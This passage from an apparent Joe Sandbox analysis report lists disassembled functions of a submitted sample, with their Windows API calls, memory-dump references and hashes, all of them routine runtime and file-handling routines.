                                                                                                                                                                                                    Function 0089AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008940EF,00000000,00000000,?,0089ACDB,008940EF,00000000,00000000,00000000,?,0089AED8,00000006,FlsSetValue), ref: 0089AD66
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,0089ACDB,008940EF,00000000,00000000,00000000,?,0089AED8,00000006,FlsSetValue,008A7970,FlsSetValue,00000000,00000364,?,008998B7), ref: 0089AD72
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0089ACDB,008940EF,00000000,00000000,00000000,?,0089AED8,00000006,FlsSetValue,008A7970,FlsSetValue,00000000), ref: 0089AD80
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                                    • Opcode ID: 790143ad63b5bb3631bc12b5dc8c941a0924169ea44a97365fb3dd4484d6d397
                                                                                                                                                                                                    • Instruction ID: 52ba3cac8dadc64fe453197cdf6e4fdf79491e80fff01b90e83b4b0c063a3c51
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 790143ad63b5bb3631bc12b5dc8c941a0924169ea44a97365fb3dd4484d6d397
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1012B36202236AFDF255B68DC44A577BA8FF467A37190720F906D7A50D721DD01C6E1
                                                                                                                                                                                                    Function 0088101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00881043
                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 0088108A
                                                                                                                                                                                                      • Part of subcall function 00876C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00876C54
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                                                                                                    • String ID: CreateThread failed
                                                                                                                                                                                                    • API String ID: 2655393344-3849766595
                                                                                                                                                                                                    • Opcode ID: 48fdf1545176969320d11cffde64af5be6337d4da76859fcf6aebe8055687b01
                                                                                                                                                                                                    • Instruction ID: 37c46fc8d18a8b0b98a1bd0db86b9619e50ee552d15b188dadba79ad020052e2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48fdf1545176969320d11cffde64af5be6337d4da76859fcf6aebe8055687b01
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0501DB75344B096FEB317E68AC59B76735CFB80751F20002EF646D6384DFA1AC868725
                                                                                                                                                                                                    Function 00879F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0087D343,00000001,?,?,?,00000000,0088551D,?,?,?), ref: 00879F9E
                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0088551D,?,?,?,?,?,00884FC7,?), ref: 00879FE5
                                                                                                                                                                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0087D343,00000001,?,?), ref: 0087A011
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileWrite$Handle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4209713984-0
                                                                                                                                                                                                    • Opcode ID: 170ff267cab900cc629633f96d71ecda69a7b332e7d2ad6328fef65c8d4880f8
                                                                                                                                                                                                    • Instruction ID: 6247150d0c2f449735491fe0789f680b70bc097a9d144d9e1ecff1cedc55e872
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 170ff267cab900cc629633f96d71ecda69a7b332e7d2ad6328fef65c8d4880f8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D531BF31208705EFDB18CF24D818B6E77A6FB85715F008919F589DB294CB75DD48CBA2
                                                                                                                                                                                                    Function 0087A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0087C27E: _wcslen.LIBCMT ref: 0087C284
                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0087A175,?,00000001,00000000,?,?), ref: 0087A2D9
                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0087A175,?,00000001,00000000,?,?), ref: 0087A30C
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0087A175,?,00000001,00000000,?,?), ref: 0087A329
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2260680371-0
                                                                                                                                                                                                    • Opcode ID: eaa75af857c6366a2a0e26c426a92bc2649d3938a4560f6695dcd6ba7aaffb07
                                                                                                                                                                                                    • Instruction ID: 7283f8610a274c7654d9caaa01f0c05773e05f0370364c01bb2de3829b00fdcb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: eaa75af857c6366a2a0e26c426a92bc2649d3938a4560f6695dcd6ba7aaffb07
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF01B531614614AAEF29AF754C09BFD3248FF4A780F04C415F909E6199D764CAC186B7
                                                                                                                                                                                                    Function 0089B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0089B8B8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Info
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                                                                                                                    • Opcode ID: 9ccfebca344e939a16d05ae8a00e265d9a4dd4b80f51b46836a55d648863f329
                                                                                                                                                                                                    • Instruction ID: 5d359cfc2671796874365673876c05d0a4556466ae1b7bc703371387cbe068fe
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ccfebca344e939a16d05ae8a00e265d9a4dd4b80f51b46836a55d648863f329
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD41F77050429C9EDF219E28DD84BF6BBE9FB45308F1804EDE69AC7142E335AA45CF61
                                                                                                                                                                                                    Function 0089AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 0089AFDD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String
                                                                                                                                                                                                    • String ID: LCMapStringEx
                                                                                                                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                                                                                                                    • Opcode ID: 6929ae1399871b0ae5d12d6b772995bcd915426e4faf128f6a971af95f692475
                                                                                                                                                                                                    • Instruction ID: c204e2552ead0e245732b6b06cbea1e16672708d45afa15fe1aae6b0b0942eea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6929ae1399871b0ae5d12d6b772995bcd915426e4faf128f6a971af95f692475
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1701483250420DBBDF06AF90DC02EEE7F62FF09754F094155FE14A6260CA368A31EB81
                                                                                                                                                                                                    Function 0089AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0089A56F), ref: 0089AF55
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                                                                                                                    • API String ID: 2593887523-3084827643
                                                                                                                                                                                                    • Opcode ID: 52942b38a2b0f5ad009c221fe58308318ce8bea84398e1454e25d640cba8225c
                                                                                                                                                                                                    • Instruction ID: bbcf92d80e93e83f7e654895e2af7661dae6ae50eb9892ab5c78c2e6557d712a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 52942b38a2b0f5ad009c221fe58308318ce8bea84398e1454e25d640cba8225c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62F0BE31645208BFDF166F54CC06DAEBFA1FF06B21B044066FD18EA260DA764E11EBC6
                                                                                                                                                                                                    Function 0089ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Alloc
                                                                                                                                                                                                    • String ID: FlsAlloc
                                                                                                                                                                                                    • API String ID: 2773662609-671089009
                                                                                                                                                                                                    • Opcode ID: fd68fadeaa4d2e616c82e21bb37cdbb7e3e9fa8878459c105dcccd0b3efc1fcf
                                                                                                                                                                                                    • Instruction ID: 8bff849043092ed7eb80e603f23e049066fd7a55265f3ab5855e9c2b53eba7a0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd68fadeaa4d2e616c82e21bb37cdbb7e3e9fa8878459c105dcccd0b3efc1fcf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FEE05530640208BBEA04BB29CC02A2EBB50FB06721B08009AF800E7740CD784E0092C6
                                                                                                                                                                                                    Function 0088EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088EAF9
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID: 3Ro
                                                                                                                                                                                                    • API String ID: 1269201914-1492261280
                                                                                                                                                                                                    • Opcode ID: 7d66345c76ccc3b60e007820804d44e8f20975e3ccc2fc1a12adad5567c9236a
                                                                                                                                                                                                    • Instruction ID: ec9de857fd49bf27e67171ecb4a7501b7d1a9ccc33acbf42135948e1cc8e4dce
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d66345c76ccc3b60e007820804d44e8f20975e3ccc2fc1a12adad5567c9236a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CB012C629E4567D3108B3451D02C3F020CF5E1F90330813FF610C4581DC800C050933
                                                                                                                                                                                                    Function 0089BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0089B7BB: GetOEMCP.KERNEL32(00000000,?,?,0089BA44,?), ref: 0089B7E6
                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0089BA89,?,00000000), ref: 0089BC64
                                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,0089BA89,?,?,?,0089BA89,?,00000000), ref: 0089BC77
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 546120528-0
                                                                                                                                                                                                    • Opcode ID: fe5c41ab9181fbcd78dce79266ab30ed670701817477a5ea859b511b0c7cb416
                                                                                                                                                                                                    • Instruction ID: e26918f56eef2340e4887b6b4ed1f83f4506bb1db638d9f39e26dacae501e914
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe5c41ab9181fbcd78dce79266ab30ed670701817477a5ea859b511b0c7cb416
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17513570A003499EDF20AF75E9816BBBBE5FF41304F1C446ED496CB652DB349941CB91
                                                                                                                                                                                                    Function 00879A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00879A50,?,?,00000000,?,?,00878CBC,?), ref: 00879BAB
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00878411,-00009570,00000000,000007F3), ref: 00879BB6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                                                    • Opcode ID: e8e3521423dc0b1c4ec8fab140f3c7770648e382e8ffd1c01e05b92dbbe716e1
                                                                                                                                                                                                    • Instruction ID: 2237028a11da6a3433a204e4e87e73d131c11842de24bfa9ac8d53e85d491b54
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8e3521423dc0b1c4ec8fab140f3c7770648e382e8ffd1c01e05b92dbbe716e1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28418B31604325CBDB24DF19E58456AB7E6FBA5330F14CA2DE8D9C3268D770ED448A52
                                                                                                                                                                                                    Function 0089BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 008997E5: GetLastError.KERNEL32(?,008B1098,00894674,008B1098,?,?,008940EF,?,?,008B1098), ref: 008997E9
                                                                                                                                                                                                      • Part of subcall function 008997E5: _free.LIBCMT ref: 0089981C
                                                                                                                                                                                                      • Part of subcall function 008997E5: SetLastError.KERNEL32(00000000,?,008B1098), ref: 0089985D
                                                                                                                                                                                                      • Part of subcall function 008997E5: _abort.LIBCMT ref: 00899863
                                                                                                                                                                                                      • Part of subcall function 0089BB4E: _abort.LIBCMT ref: 0089BB80
                                                                                                                                                                                                      • Part of subcall function 0089BB4E: _free.LIBCMT ref: 0089BBB4
                                                                                                                                                                                                      • Part of subcall function 0089B7BB: GetOEMCP.KERNEL32(00000000,?,?,0089BA44,?), ref: 0089B7E6
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089BA9F
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089BAD5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2991157371-0
                                                                                                                                                                                                    • Opcode ID: 47b3629febb0dfd654389754717a3a019a21e029ec903364b415a1f019c4e5aa
                                                                                                                                                                                                    • Instruction ID: a03813a6d904bfe080120b78d3614d7344dc48eda4dbdd493dfde14f47cde69c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47b3629febb0dfd654389754717a3a019a21e029ec903364b415a1f019c4e5aa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A31B131904219AFDF10FFA8EA41BADB7E5FF41320F294099E904DB2A2EB725D40DB51
                                                                                                                                                                                                    Function 00871E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00871E55
                                                                                                                                                                                                      • Part of subcall function 00873BBA: __EH_prolog.LIBCMT ref: 00873BBF
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00871EFD
